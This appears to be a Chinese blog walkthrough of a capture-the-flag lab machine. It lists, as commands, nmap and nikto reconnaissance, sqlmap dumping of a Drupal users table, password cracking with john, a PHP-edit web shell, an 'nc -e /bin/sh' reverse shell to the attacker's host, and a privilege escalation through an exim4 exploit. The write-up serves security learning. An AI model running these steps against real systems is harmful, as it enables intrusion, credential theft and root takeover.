❤️博客主页： iknow181
🔥系列专栏： 网络安全、 Python、JavaSE、JavaWeb、CCNP
🎉欢迎大家点赞👍收藏⭐评论✍

---

目标：192.168.216.150

一、收集信息

1.端口扫描

nmap -T4 -A 192.168.216.150 -p-

看到80端口

2.扫描网站

nikto -u http://192.168.216.150

扫描到登录页面http://192.168.216.150/user/login

3.查看网站

发现url有/?nid=1，可能可以使用sql注入

二、漏洞扫描

1.使用sqlmap

sqlmap -u http://192.168.216.150/?nid=1 --dbs
发现库名d7db

sqlmap -u http://192.168.216.150/?nid=1 -D d7db --table
发现users

sqlmap -u http://192.168.216.150/?nid=1 -D d7db -T users --columns
发现name，pass

sqlmap -u http://192.168.216.150/?nid=1 -D d7db -T users -C name,pass --dump
发现admin，john

将username和password放到一个usernamepass.txt文件中，用:连接

2.破解密码

john usernamepass.txt

爆出john的密码:turtle

三、漏洞利用

1.登录网站后台

192.168.216.150/user/login

2.nc连接

找到可以编辑php代码的地方

保存

kali端nc进行监听
nc -lvp 1234

到view页面提交一个

四、提权

1.美化界面

python -c 'import pty;pty.spawn("/bin/bash")'

2.看一下哪些是以root权限执行的

find / -perm -u=s -type f 2>/dev/null

发现

3.查看exim4的版本

4.查看exim4的漏洞

searchsploit exim

5.下载木马

6.建立一个python服务器让对方下载

7.查看木马怎么用

8.执行木马（先赋予777权限）

9.再次nc连接

nc -lvp 9988

nc -e /bin/sh 192.168.216.163 9988

总结

有的时候，漏洞无法使用，可能是字符的问题。

解决方法：

vi 文件.sh

在命令行模式输入 :set ff? 查看字符格式，如果是dos就不行，一定要为unix

在命令行模式输入 :set ff=unix